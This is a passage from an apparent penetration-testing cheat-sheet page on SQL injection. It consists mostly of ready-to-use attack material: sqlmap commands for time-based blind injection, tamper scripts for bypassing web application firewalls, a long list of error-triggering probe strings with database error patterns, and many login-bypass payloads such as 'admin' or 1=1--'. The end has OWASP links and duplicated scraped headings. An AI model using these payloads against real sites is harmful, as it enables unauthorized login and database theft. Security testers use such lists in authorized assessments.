sqlmap -r req.txt -v 3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --current-db
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=BT --current-db

9.Blind Sql injection WAF bypass (tamper):

Example:
sqlmap -r req.txt -v 3 -p "input parameter" --level=5 --risk=3 --time-sec=5 --technique=T --tamper=between --current-dbMysql,Mssql,Postgresql,Oracle (Blind):
betweenMysql (Blind):
ifnull2casewhenisnullifnull2ifisnullMysql,Mssql,Postgresql,Oracle (Blind):
charencodeMysql,Mssql,Postgresql (Blind):
charunicodeencodeMysql (Blind):
commalesslimitcommalessmidMysql (Blind):
escapequotesUTF-8 (Blind):
apostrophemaskoverlongutf8overlongutf8moreBypass waf in JSON (Blind):
charunicodeescapeMysql,Postgresql,Oracle (Blind):
greatestCloudfare waf (Blind):
xforwardedfor

And

Quick SQLMap Tamper Suggester: https://github.com/m4ll0k/Atlas

10.Sql detection payload (Generic Error):

'
"
"'
' "
'"
'''
.
/
\
%5c
%27
%22
%23
%3B
%27%22%60
%22%27
%27%20%22
%27%22
%27%27%27
)
")
')
))
"))
'))
)))
#
;
''
`
``
,
""
//
\\
%
%00
||
0.or-1%23
'or-1%23
%2F
%5C
%29
%22%29
%27%29
%29%29
%22%29%29
%27%29%29
%27%27
%60
%60%60
%2C
%22%22
%2F%2F
%5C%5C
%7C%7C
28 %
%2A%7C
//*
%7C
29 %
(
*/*
|
*
*)(&
*)(|(&
*)(|(*
*))%00
-'#Detection source:["SQL syntax.*MySQL", "Warning.*mysql_.*", "valid MySQL result", "MySqlClient\."]
["PostgreSQL.*ERROR", "Warning.*\Wpg_.*", "valid PostgreSQL result", "Npgsql\."]
["Driver.* SQL[\-\_\ ]*Server", "OLE DB.* SQL Server", "(\W|\A)SQL Server.*Driver", "Warning.*mssql_.*", "(\W|\A)SQL Server.*[0-9a-fA-F]{8}", "(?s)Exception.*\WSystem\.Data\.SqlClient\.", "(?s)Exception.*\WRoadhouse\.Cms\."]
["Microsoft Access Driver", "JET Database Engine", "Access Database Engine"]
["\bORA-[0-9][0-9][0-9][0-9]", "Oracle error", "Oracle.*Driver", "Warning.*\Woci_.*", "Warning.*\Wora_.*"]
["CLI Driver.*DB2", "DB2 SQL error", "\bdb2_\w+\("]
["SQLite/JDBCDriver", "SQLite.Exception", "System.Data.SQLite.SQLiteException", "Warning.*sqlite_.*", "Warning.*SQLite3::", "\[SQLITE_ERROR\]"]
["(?i)Warning.*sybase.*", "Sybase message", "Sybase.*Server message.*"]

11.SQL Injection Auth Bypass:

'=' 'or'
' or ''='
/1#\
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
1'or'1'='1
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*

References :

Blind SQL Injection

https://www.owasp.org/index.php/Blind_SQL_Injection

Testing for SQL Injection (OTG-INPVAL-005)

https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)

SQL Injection Bypassing WAF

https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF

Reviewing Code for SQL Injection

https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection

PL/SQL:SQL Injection

https://www.owasp.org/index.php/PL/SQL:SQL_Injection

Testing for NoSQL injection

https://www.owasp.org/index.php/Testing_for_NoSQL_injection

SQL Injection Query Parameterization Cheat Sheet

https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html

SQL detection and Exploitation:

http://www.securityidiots.com/Web-Pentest/SQL-Injection https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection https://github.com/payloadbox/sql-injection-payload-list https://github.com/Y000o/Payloads_xss_sql_bypass/blob/master/Payloads_xss_sql_bypass.md

PreviousLDAP Authentication From the Command Line in Linux NextKerberus > kerbrute

Last updated 2 years ago

hashtagPayload list:

hashtagMySQL Blind (Time Based):

hashtagMicrosoft SQL Server Blind (Time Based):

hashtagPostgresql Blind (Time Based):

hashtagOracle Blind (Time Based):

hashtagYou can replace AND / OR

hashtagGeneric Time Based SQL Injection Payloads:

hashtagIf response delay between 5 to 7 Seconds . It means vulnerable.

hashtagDetection and exploitation:

hashtag1.=payload

hashtagExample:

hashtag2.=value payload

hashtagExample:

hashtagMysql blind sql injection (time based):

hashtagMSSQL blind Sql injection (time based):

hashtag7.Blind Sql injection exploitation (Manual):

hashtag8.Blind Sql injection exploitation via sqlmap:

hashtag9.Blind Sql injection WAF bypass (tamper):

hashtagAnd

hashtagQuick SQLMap Tamper Suggester: https://github.com/m4ll0k/Atlas

hashtag10.Sql detection payload (Generic Error):

hashtag11.SQL Injection Auth Bypass:

hashtagReferences :

Payload list:

MySQL Blind (Time Based):

Microsoft SQL Server Blind (Time Based):

Postgresql Blind (Time Based):

Oracle Blind (Time Based):

You can replace AND / OR

Generic Time Based SQL Injection Payloads:

If response delay between 5 to 7 Seconds . It means vulnerable.

Detection and exploitation:

1.=payload

Example:

2.=value payload

Example:

Mysql blind sql injection (time based):

MSSQL blind Sql injection (time based):

7.Blind Sql injection exploitation (Manual):

8.Blind Sql injection exploitation via sqlmap:

9.Blind Sql injection WAF bypass (tamper):

And

Quick SQLMap Tamper Suggester: https://github.com/m4ll0k/Atlas

10.Sql detection payload (Generic Error):

11.SQL Injection Auth Bypass:

References :